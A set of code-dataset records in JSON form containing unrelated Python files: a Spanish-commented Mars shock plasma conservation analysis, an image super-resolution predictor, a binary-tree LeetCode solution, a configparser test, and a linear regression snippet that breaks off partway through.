grid_alpha)\n# \n# plt.subplot(122)\n# plt.title(r' Downstream - t = {} hora decimal'.format(round(t_swea[ind_td_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_td_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.yscale('log')\n# plt.xscale('log')\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_d)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# \n#\n#\n#Te_u, ind_aam_u, aam_u, f_gauss_u, params_u, ind_Emin_fit_u, ind_Emax_fit_u = Te(ind_tu_Te, 4, 43, 2e8, 10, 1, dist_e = flujosenergia_swea, energ = nivelesenergia_swea, t = t_swea) #* \n#Te_d, ind_aam_d, aam_d, f_gauss_d, params_d, ind_Emin_fit_d, ind_Emax_fit_d = Te(ind_td_Te, 16, 88, 6e8, 30, 1, dist_e = flujosenergia_swea, energ = nivelesenergia_swea, t = t_swea) #*\n#\n#if MODO_hipotesisMHD == 1:\n# \n# \n# plt.figure(12, figsize = figsize)\n# \n# plt.subplot(121)\n# plt.title(r' Upstream - t = {} hora decimal'.format(round(t_swea[ind_tu_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_tu_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.plot(nivelesenergia_swea, f_gauss_u, linewidth = lw, marker = 'o', markersize = msize, color = colors[1])\n# \n# plt.axvspan(xmin = nivelesenergia_swea[ind_Emin_fit_u], xmax = nivelesenergia_swea[ind_Emax_fit_u], facecolor = colors[2], alpha = 0.3)\n# plt.axhline(y = aam_u, linewidth = lw, color = colors[3], label = 'FWHM')\n# plt.axvline(x = Te_u, linewidth = lw, color = colors[4], label = r'$T_e$ = {} eV'.format(round(np.float64(Te_u),2)))\n# plt.axvline(x = params_u[1], linewidth = lw, color = colors[5], label = r'$\\mu$')\n# \n# plt.yscale('log')\n# plt.xscale('log')\n# plt.ylabel(r'Distribución de electrones', fontsize = font_label)\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_u)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.legend(loc = 0, fontsize = font_leg)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# \n# plt.subplot(122)\n# plt.title(r' Downstream - t = {} hora decimal'.format(round(t_swea[ind_td_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_td_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.plot(nivelesenergia_swea, f_gauss_d, linewidth = lw, marker = 'o', markersize = msize, color = colors[1])\n# \n# plt.axvspan(xmin = nivelesenergia_swea[ind_Emin_fit_d], xmax = nivelesenergia_swea[ind_Emax_fit_d], facecolor = colors[2], alpha = 0.3)\n# plt.axhline(y = aam_d, linewidth = lw, color = colors[3], label = 'FWHM')\n# plt.axvline(x = Te_d, linewidth = lw, color = colors[4], label = r'$T_e$ = {} eV'.format(round(np.float64(Te_d),2)))\n# plt.axvline(x = params_d[1], linewidth = lw, color = colors[5], label = r'$\\mu$')\n# \n# plt.yscale('log')\n# plt.xscale('log')\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_d)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.legend(loc = 0, fontsize = font_leg)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# plt.savefig(path_analisis+'Te{}'.format(shock_date))\n# plt.savefig(path_analisis+'Te{}.pdf'.format(shock_date)) \n# \n# \n# \n# \n#\n#%%\n#chequeo relaciones RH\n\n\n\n#elijo respecto a que normal calculo las conservaciones\nnorm = np.copy(N) #* ahora elegi la del fit\n\n\n#paso todo lo que use en esta seccion a SI\n\n\n# vel en m/s (tang y normales)\nU_u = Vu*(1e3)\nU_d = Vd*(1e3)\nU_un = np.dot(norm,U_u)\nU_dn = np.dot(norm,U_d)\nU_ut = (U_u - U_un*norm)\nU_dt = (U_d - U_dn*norm)\n\n#B en T (tang y normales)\nB_u = Bu*(1e-9)\nB_d = Bd*(1e-9)\nB_un = np.dot(norm,B_u)\nB_dn = np.dot(norm,B_d)\nB_ut = (B_u - B_un*norm)\nB_dt = (B_d - B_dn*norm)\n\n#densidad en kg/m^3\nmp = 1.67e-27 #masa del proton en kg\n#mp = 1.5e-10 #masa del proton en joules/c^2\ndensnum_u = np.mean(densidad_swia[min(iu_v,fu_v):max(iu_v,fu_v)])*(1e6) #1/m^3\ndensnum_d = np.mean(densidad_swia[min(id_v,fd_v):max(id_v,fd_v)])*(1e6) #1/m^3\nrho_u = mp*densnum_u\nrho_d = mp*densnum_d\n\n#presion suponiendo gas ideal (en Pa=J/m^3)\nkB = 1.38e-23 #cte de Boltzmann en J/K\n#por ahora supongo T = 2*Ti, tendria que ser T=Ti+Te\nTu = 2*np.mean(temperatura_swia_norm[min(iu_v,fu_v):max(iu_v,fu_v)])*(11604.5) #en K\nTd = 2*np.mean(temperatura_swia_norm[min(id_v,fd_v):max(id_v,fd_v)])*(11604.5) #en K\n##con Te estimadas de las distribuciones\n#Tu = (np.mean(temperatura_swia_norm[min(iu_v,fu_v):max(iu_v,fu_v)])+Te_u)*(11604.5) #en K\n#Td = (np.mean(temperatura_swia_norm[min(id_v,fd_v):max(id_v,fd_v)])+Te_d)*(11604.5) #en K\nPu = densnum_u*kB*Tu\nPd = densnum_d*kB*Td\n\n\n\n#numeros de Mach\n\nmu = (np.pi*4)*(1e-7) #permeabilidad mag del vacio en Wb/Am=mT/A\n\nv_alfv = (np.linalg.norm(B_u)/np.sqrt(mu*rho_u))*(1e-3) # km/s\nv_alfv_2 = (np.linalg.norm(B_u)/np.sqrt(mu*mp*(densnum_u + 0.05*densnum_u)))*(1e-3) # km/s considero n=n_p+n_He, con n_He = 5%n_p\n\nv_cs = (np.sqrt((Pu/(2*rho_u))*(5/3)))*(1e-3) # km/s\n#si no les aplico sqrt dan ordenes de magnitud sin sentido:\n#v_cs_2 = ((5/3)*(kB*Tu)/mp)*(1e-3) #km/s\n#v_cs_3 = ((3*kB*Tu/2)/mp)*(1e-3) #km/s\n\nM_c = 2.7 #M_A critico para theta_Bun = 90, para angulos menores decrese\nM_A = np.linalg.norm(Vu)/v_alfv_2\nM_cs = np.linalg.norm(Vu)/v_cs\nM_f = np.linalg.norm(Vu)/np.sqrt(v_alfv_2**2 + v_cs**2)\n\n#Mach locales\nM_A_loc = np.abs(np.dot(Vu,norm))/v_alfv_2\nM_cs_loc = np.abs(np.dot(Vu,norm))/v_cs\nM_f_loc = np.abs(np.dot(Vu,norm))/np.sqrt(v_alfv_2**2 + v_cs**2)\n\n\n#beta del plasma upstream\nbeta = Pu/(np.linalg.norm(B_u)**2/(2*mu))\n\n\n#chequeo si se cumple la hipotesis de evolucion adiabatica (gamma da 5/3)\nG = Symbol('G')\neq_adiab = Pu*rho_u**G - (Pd*rho_d**G)\ngam = solve(eq_adiab, G)\n\n\n\n\n#relaciones RH en porcentaje (100 = se cumple perfectamente)\n\n#conservacion de la masa\ncons_masa_u = np.abs(rho_u*U_un)\ncons_masa_d = np.abs(rho_d*U_dn)\ncons_masa = np.min([cons_masa_u,cons_masa_d])/np.max([cons_masa_u,cons_masa_d])*100\n\n#consevacion del impulso normal al shock\ncons_impul_n_u = np.abs(rho_u*U_un**2 + Pu + np.dot(B_u,B_u)/(2*mu))\ncons_impul_n_d = np.abs(rho_d*U_dn**2 + Pd + np.dot(B_d,B_d)/(2*mu))\ncons_impul_n = np.min([cons_impul_n_d,cons_impul_n_u])/np.max([cons_impul_n_d,cons_impul_n_u])*100\n\n#conservacion del impulso tangencial al shock\ncons_impul_t_u = np.abs(rho_u*U_un*U_ut - B_un/mu*B_ut)\ncons_impul_t_d = np.abs(rho_d*U_dn*U_dt - B_dn/mu*B_dt)\ncons_impul_t = np.empty_like(cons_impul_t_u)\nfor i in range(len(cons_impul_t_u)):\n cons_impul_t[i] = np.min([cons_impul_t_d[i],cons_impul_t_u[i]])/np.max([cons_impul_t_d[i],cons_impul_t_u[i]])*100\n\n#consevacion de la energia\ngamma = 5/3\ncons_energ_u = np.abs(rho_u*U_un*(1/2*np.dot(U_u,U_u) + gamma/(gamma-1)*Pu/rho_u) + U_un*np.dot(B_u,B_u)/mu - np.dot(U_u,B_u)*B_un/mu)\ncons_energ_d = np.abs(rho_d*U_dn*(1/2*np.dot(U_d,U_d) + gamma/(gamma-1)*Pd/rho_d) + U_dn*np.dot(B_d,B_d)/mu - np.dot(U_d,B_d)*B_dn/mu)\ncons_energ = np.min([cons_energ_d,cons_energ_u])/np.max([cons_energ_d,cons_energ_u])*100\n\n#conservacion de componente normal de B\ncons_Bn_u = np.abs(B_un)\ncons_Bn_d = np.abs(B_dn)\ncons_Bn = np.min([cons_Bn_d,cons_Bn_u])/np.max([cons_Bn_d,cons_Bn_u])*100\n\n#conservacion de campo electrico tang\ncons_Et_u = np.abs(U_un*B_ut - B_un*U_ut)\ncons_Et_d = np.abs(U_dn*B_dt - B_dn*U_dt)\ncons_Et = np.empty_like(cons_Et_u)\nfor i in range(len(cons_Et)):\n cons_Et[i] = np.min([cons_Et_d[i],cons_Et_u[i]])/np.max([cons_Et_d[i],cons_Et_u[i]])*100\n\n#hipotesis de coplanaridad\nhipt_copl_B = np.dot(norm,np.cross(B_u,B_d))\n\n\n#%%------------------------------- GUARDO RESULTADOS ------------------------------\n\nif MODO_hipotesisMHD == 1:\n \n datos6 = np.zeros([14,5])\n \n #normal de referencia\n datos6[0,0:3] = norm\n \n #Tu Td Pu Pd rho_u rho_d\n datos6[1,0] = Tu\n datos6[1,1] = Td\n datos6[1,2] = Pu\n datos6[1,3] = Pd\n datos6[1,4] = rho_u\n datos6[1,4] = rho_d\n \n #gamma de evolución adiabatica\n datos6[2,0] = gam\n \n #velocidades\n datos6[3,0] = v_alfv\n datos6[3,1] = v_cs\n datos6[3,2] = v_cs_2\n datos6[3,3] = v_cs_3\n \n #numeros de Mach\n datos6[4,0] = M_A\n datos6[4,1] = M_cs\n datos6[4,2] = M_f\n datos6[4,3] = M_c\n \n #beta upstream\n datos6[5,0] = beta\n \n #conservaciones\n datos6[6,0] = cons_masa\n datos6[7,0:3] = cons_impul_n\n datos6[8,0:3] = cons_impul_t\n datos6[9,0:3] = cons_energ\n datos6[10,0] = cons_Bn\n datos6[11,0:3] = cons_Et\n \n #hipotesis teo coplanaridad\n datos6[12,0] = hipt_copl_B\n \n #salto B, salto rho\n datos6[13,0] = saltoB\n datos6[13,1] = saltorho\n \n np.savetxt(path_analisis+'hipotesis_MHD_shock_{}'.format(shock_date), datos6, delimiter = '\\t',\n header = '\\n'.join(['{}'.format(shock_date),'normal de ref usada en calculos',\n 'Tu Td [K] Pu Pd [Pa], rho_u rho_d [kg/m^3]',\n 'gamma si el sist evolucionara adiabaticamente',\n 'v_alf v_cs v_cs_2 v_cs_3',\n 'M_Alfv M_sonico M_rapido M_critico', 'beta',\n 'conservacion masa',\n 'conservacion impulso norm',\n 'conservacion impulso tang',\n 'conservacion energia',\n 'conservacion Bn',\n 'conservacion campo electrico tang',\n 'hipotesis teo coplanaridad [nT]',\n 'salto B salto rho']))\n", "repo_name": "sofiaburne/Tesis", "sub_path": "conservaciones.py", "file_name": "conservaciones.py", "file_ext": "py", "file_size_in_byte": 17021, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "mag.shock_date", "line_number": 24, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "delimitacionshock.t_mag", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "delimitacionshock.t_swia_mom", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 93, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 93, "usage_type": "name"}, {"api_name": "delimitacionshock.iu_v", "line_number": 93, "usage_type": "argument"}, {"api_name": "delimitacionshock.fu_v", "line_number": 93, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 94, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 94, "usage_type": "name"}, {"api_name": "delimitacionshock.id_v", "line_number": 94, "usage_type": "argument"}, {"api_name": "delimitacionshock.fd_v", "line_number": 94, "usage_type": "argument"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 96, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "delimitacionshock.t_mag", "line_number": 102, "usage_type": "argument"}, {"api_name": "delimitacionshock.B", "line_number": 102, "usage_type": "argument"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 103, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 104, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 105, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 105, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 106, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.twinx", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "delimitacionshock.t_swia_mom", "line_number": 116, "usage_type": "argument"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 116, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 128, "usage_type": "argument"}, {"api_name": "mag.shock_date", "line_number": 129, "usage_type": "argument"}, {"api_name": "numpy.copy", "line_number": 247, "usage_type": "call"}, {"api_name": "subestructuras_calculos_2.N", "line_number": 247, "usage_type": "argument"}, {"api_name": "delimitacionshock.Vu", "line_number": 254, "usage_type": "name"}, {"api_name": "delimitacionshock.Vd", "line_number": 255, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 257, "usage_type": "call"}, {"api_name": "delimitacionshock.Bu", "line_number": 262, "usage_type": "name"}, {"api_name": "delimitacionshock.Bd", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 272, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 272, "usage_type": "name"}, {"api_name": "delimitacionshock.iu_v", "line_number": 272, "usage_type": "argument"}, {"api_name": "delimitacionshock.fu_v", "line_number": 272, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 273, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 273, "usage_type": "name"}, {"api_name": "delimitacionshock.id_v", "line_number": 273, "usage_type": "argument"}, {"api_name": "delimitacionshock.fd_v", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 280, "usage_type": "call"}, {"api_name": "delimitacionshock.temperatura_swia_norm", "line_number": 280, "usage_type": "name"}, {"api_name": "delimitacionshock.iu_v", "line_number": 280, "usage_type": "argument"}, {"api_name": "delimitacionshock.fu_v", "line_number": 280, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 281, "usage_type": "call"}, {"api_name": "delimitacionshock.temperatura_swia_norm", "line_number": 281, "usage_type": "name"}, {"api_name": "delimitacionshock.id_v", "line_number": 281, "usage_type": "argument"}, {"api_name": "delimitacionshock.fd_v", "line_number": 281, "usage_type": "argument"}, {"api_name": "numpy.pi", "line_number": 292, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 294, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 295, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 303, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 303, "usage_type": "argument"}, {"api_name": "numpy.linalg", "line_number": 303, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 304, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 304, "usage_type": "argument"}, {"api_name": "numpy.linalg", "line_number": 304, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 305, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 305, "usage_type": "argument"}, {"api_name": "numpy.linalg", "line_number": 305, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 308, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 308, "usage_type": "argument"}, {"api_name": "numpy.abs", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 309, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 309, "usage_type": "argument"}, {"api_name": "numpy.abs", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 310, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 310, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 314, "usage_type": "attribute"}, {"api_name": "sympy.Symbol", "line_number": 318, "usage_type": "call"}, {"api_name": "sympy.solvers.solve", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 416, "usage_type": "call"}, {"api_name": "mag.shock_date", "line_number": 416, "usage_type": "argument"}, {"api_name": "mag.shock_date", "line_number": 417, "usage_type": "argument"}]} +{"seq_id": "23951806600", "text": "from time import time\n\nimport imageio\nimport yaml\nimport numpy as np\nfrom pathlib import Path\n\nfrom ISR.utils.logger import get_logger\nfrom ISR.utils.utils import get_timestamp\n\n\nclass Predictor:\n \"\"\"The predictor class handles prediction, given an input model.\n\n Loads the images in the input directory, executes training given a model\n and saves the results in the output directory.\n Can receive a path for the weights or can let the user browse through the\n weights directory for the desired weights.\n\n Args:\n input_dir: string, path to the input directory.\n output_dir: string, path to the output directory.\n verbose: bool.\n\n Attributes:\n extensions: list of accepted image extensions.\n img_ls: list of image files in input_dir.\n\n Methods:\n get_predictions: given a model and a string containing the weights' path,\n runs the predictions on the images contained in the input directory and\n stores the results in the output directory.\n \"\"\"\n\n def __init__(self, input_dir, output_dir='./data/output', verbose=True):\n\n self.input_dir = Path(input_dir)\n self.data_name = self.input_dir.name\n self.output_dir = Path(output_dir) / self.data_name\n self.logger = get_logger(__name__)\n if not verbose:\n self.logger.setLevel(40)\n self.extensions = ('.jpeg', '.jpg', '.png') # file extensions that are admitted\n self.img_ls = [f for f in self.input_dir.iterdir() if f.suffix in self.extensions]\n if len(self.img_ls) < 1:\n self.logger.error('No valid image files found (check config file).')\n raise ValueError('No valid image files found (check config file).')\n # Create results folder\n if not self.output_dir.exists():\n self.logger.info('Creating output directory:\\n{}'.format(self.output_dir))\n self.output_dir.mkdir(parents=True)\n\n def _load_weights(self):\n \"\"\" Invokes the model's load weights function if any weights are provided. \"\"\"\n if self.weights_path is not None:\n self.logger.info('Loaded weights from \\n > {}'.format(self.weights_path))\n # loading by name automatically excludes the vgg layers\n self.model.model.load_weights(str(self.weights_path))\n else:\n self.logger.error('Error: Weights path not specified (check config file).')\n raise ValueError('Weights path not specified (check config file).')\n\n session_config_path = self.weights_path.parent / 'session_config.yml'\n if session_config_path.exists():\n conf = yaml.load(session_config_path.read_text(), Loader=yaml.FullLoader)\n else:\n self.logger.warning('Could not find weights training configuration')\n conf = {}\n conf.update({'pre-trained-weights': self.weights_path.name})\n return conf\n\n def _make_basename(self):\n \"\"\" Combines generators's name and its architecture's parameters. \"\"\"\n\n params = [self.model.name]\n for param in np.sort(list(self.model.params.keys())):\n params.append('{g}{p}'.format(g=param, p=self.model.params[param]))\n return '-'.join(params)\n\n def get_predictions(self, model, weights_path):\n \"\"\" Runs the prediction. \"\"\"\n\n self.model = model\n self.weights_path = Path(weights_path)\n weights_conf = self._load_weights()\n out_folder = self.output_dir / self._make_basename() / get_timestamp()\n self.logger.info('Results in:\\n > {}'.format(out_folder))\n if out_folder.exists():\n self.logger.warning('Directory exists, might overwrite files')\n else:\n out_folder.mkdir(parents=True)\n if weights_conf:\n yaml.dump(weights_conf, (out_folder / 'weights_config.yml').open('w'))\n # Predict and store\n for img_path in self.img_ls:\n output_path = out_folder / img_path.name\n self.logger.info('Processing file\\n > {}'.format(img_path))\n start = time()\n sr_img = self._forward_pass(img_path)\n end = time()\n self.logger.info('Elapsed time: {}s'.format(end - start))\n self.logger.info('Result in: {}'.format(output_path))\n imageio.imwrite(output_path, sr_img)\n\n def _forward_pass(self, file_path):\n lr_img = imageio.imread(file_path)\n if lr_img.shape[2] == 3:\n sr_img = self.model.predict(lr_img)\n return sr_img\n else:\n self.logger.error('{} is not an image with 3 channels.'.format(file_path))\n", "repo_name": "idealo/image-super-resolution", "sub_path": "ISR/predict/predictor.py", "file_name": "predictor.py", "file_ext": "py", "file_size_in_byte": 4631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4348, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 39, "usage_type": "call"}, {"api_name": "ISR.utils.logger.get_logger", "line_number": 40, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 65, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 76, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 84, "usage_type": "call"}, {"api_name": "ISR.utils.utils.get_timestamp", "line_number": 86, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "imageio.imwrite", "line_number": 103, "usage_type": "call"}, {"api_name": "imageio.imread", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "31574268787", "text": "# Definition for a binary tree node.\r\nfrom typing import Optional\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\n\r\nclass Solution:\r\n def increasingBST(self, root: TreeNode) -> Optional[TreeNode]:\r\n \"\"\"\r\n Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node\r\n in the tree is now the root of the tree, and every node has no left child and only one right child.\r\n :param root: root of the tree \r\n :return: the root of the tree after rearranging\r\n \"\"\"\r\n # Idea: DFS on the tree and create a new tree\r\n # Time complexity: O(n)\r\n # Space complexity: O(n)\r\n if not root:\r\n return None\r\n self.res = []\r\n\r\n def dfs(node):\r\n if not node:\r\n return\r\n dfs(node.left)\r\n self.res.append(node.val)\r\n dfs(node.right)\r\n \r\n dfs(root)\r\n new_root = TreeNode(self.res[0])\r\n cur = new_root\r\n for i in range(1, len(self.res)):\r\n cur.right = TreeNode(self.res[i])\r\n cur = cur.right\r\n return new_root\r\n\r\n ", "repo_name": "datboi2001/DSA", "sub_path": "Graph/DFS_on_graph/increasing_order_tree.py", "file_name": "increasing_order_tree.py", "file_ext": "py", "file_size_in_byte": 1259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "5894178320", "text": "import configparser\nimport os\n\n\ndef test_get_config():\n config = configparser.ConfigParser()\n # os.environ['HOME']\n # xpath = os.path.join(os.environ['HOMEPATH'], 'host.ini')\n xpath = 'D:/拉钩/work/pythonProject/Ellie/lianxi/host.ini'\n config.read(xpath)\n r = config.options(\"mysql\")\n print(r)\n print(config.get('mysql','host'))\n print(config.items(\"mysql\"))\n return config\n\n # print('获取配置文件所有的section', sections)\n #\n # options = conf.options('mysql')\n # print('获取指定section下所有option', options)\n #\n # items = conf.items('mysql')\n # print('获取指定section下所有的键值对', items)\n #\n # value = conf.get('mysql', 'host')\n # print('获取指定的section下的option', type(value), value)\n", "repo_name": "Ellie2020-ellie/Hogwarts_works", "sub_path": "Ellie/lianxi/test_host_ini.py", "file_name": "test_host_ini.py", "file_ext": "py", "file_size_in_byte": 789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "25878616113", "text": "import pandas as pd\nfrom io import StringIO\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n csv_data = 'square_feet,price\\n150,6450\\n200,7450\\n250,8450\\n300,9450\\n350,11450\\n400,15450\\n600,18450\\n'\n # 读入dataframe\n df = pd.read_csv(StringIO(csv_data))\n print(df)\n x = df['square_feet'].values.reshape(-1, 1)\n y = df['price']\n # 建立线性回归模型\n regr = linear_model.LinearRegression()\n # 拟合\n regr.fit(x, y) # 注意此处.reshape(-1, 1),因为X是一维的!\n # 不难得到直线的斜率、截距\n a, b = regr.coef_, regr.intercept_\n # 给出待预测面积\n area = 